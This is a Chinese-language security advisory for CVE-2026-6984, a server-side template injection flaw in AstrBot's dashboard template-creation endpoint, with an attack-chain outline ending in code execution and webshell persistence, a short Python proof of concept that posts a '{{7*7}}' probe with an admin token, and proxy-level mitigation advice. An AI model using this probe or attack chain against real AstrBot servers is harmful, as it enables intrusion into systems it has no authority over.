CVE-2026-6984 CVSS 4.7 中危

CVE-2026-6984 AstrBot服务器端模板注入漏洞

披露日期: 2026-04-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6984

漏洞类型

服务器端模板注入 (SSTI)

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

AstrBotDevs AstrBot

漏洞概述

AstrBotDevs AstrBot 4.22.1及之前版本存在安全漏洞。该漏洞位于仪表板API组件的`create_template`函数中，由于未能正确中和模板引擎中的特殊元素，导致SSTI。攻击者需拥有高权限，可远程利用此漏洞，造成机密性、完整性及可用性影响。目前利用代码已公开，官方尚未修复。

技术细节

该漏洞位于AstrBot的Dashboard API中，具体涉及文件`astrbot/dashboard/routes/t2i.py`的`create_template`函数。该函数用于创建文生图模板，但在处理用户输入时，未对模板引擎（如Jinja2）的特定语法字符（如`{{`、`{%`）进行充分的过滤或转义，直接将其传入渲染层。根据CVSS向量，攻击者需要获取高权限账户（PR:H）。一旦通过认证，攻击者可构造包含恶意模板语法的HTTP请求发送至服务器。服务器解析并渲染该模板时，会执行其中的恶意代码。利用SSTI漏洞，攻击者可绕过沙箱限制执行任意Python代码，从而读取服务器敏感文件、获取系统权限或进行进一步的内网渗透，对系统安全构成严重威胁。

攻击链分析

STEP 1

侦察

攻击者识别目标运行的是AstrBot且版本小于等于4.22.1。

STEP 2

获取凭证

利用社会工程学或其他漏洞获取管理员或高权限账户的API Token或Session。

STEP 3

漏洞利用

使用高权限会话，向`/api/dashboard/t2i/create_template`发送包含恶意SSTI Payload的POST请求。

STEP 4

代码执行

服务器端模板引擎解析恶意Payload并执行Python代码，可能导致RCE。

STEP 5

维持权限

攻击者根据执行结果写入Webshell或窃取数据，维持对服务器的控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL endpoint for the vulnerable function
target_url = "http://target-ip:port/api/dashboard/t2i/create_template"

# SSTI Payload to test (Jinja2 syntax)
# Checks if the multiplication 7*7 is evaluated to 49
payload = "{{7*7}}"

# Headers simulating a high-privilege authenticated session
headers = {
    "Authorization": "Bearer <admin_access_token>",
    "Content-Type": "application/json"
}

# JSON data payload sent in the POST request
data = {
    "template_name": "malicious_test",
    "template_content": payload  # The vulnerable field
}

try:
    # Send the malicious request
    response = requests.post(target_url, json=data, headers=headers, timeout=10)
    
    # Check if the payload was executed (49 indicates SSTI)
    if "49" in response.text:
        print("[+] Vulnerability Confirmed: The server evaluated the template expression.")
    else:
        print("[-] Not Vulnerable or Patched.")
        
except Exception as e:
    print(f"[!] Request failed: {e}")

影响范围

AstrBotDevs AstrBot <= 4.22.1

防御指南

临时缓解措施

由于厂商尚未响应，建议暂时禁用Dashboard中的文生图模板创建功能。对于必须使用的场景，建议在反向代理（如Nginx）层配置规则，拦截包含`{{`、`{%`、`{#`等模板语法特征的请求参数。同时，应加强对管理员账户的监控，防止凭证泄露。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6984
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6984
3 Details https://www.cvedetails.com/cve/CVE-2026-6984/
4 VulDB https://vuldb.com/cve/CVE-2026-6984
5 Link https://github.com/AstrBotDevs/AstrBot/
6 Link https://github.com/AstrBotDevs/AstrBot/issues/7330
7 Link https://vuldb.com/submit/796164
8 Link https://vuldb.com/vuln/359527
9 Link https://vuldb.com/vuln/359527/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表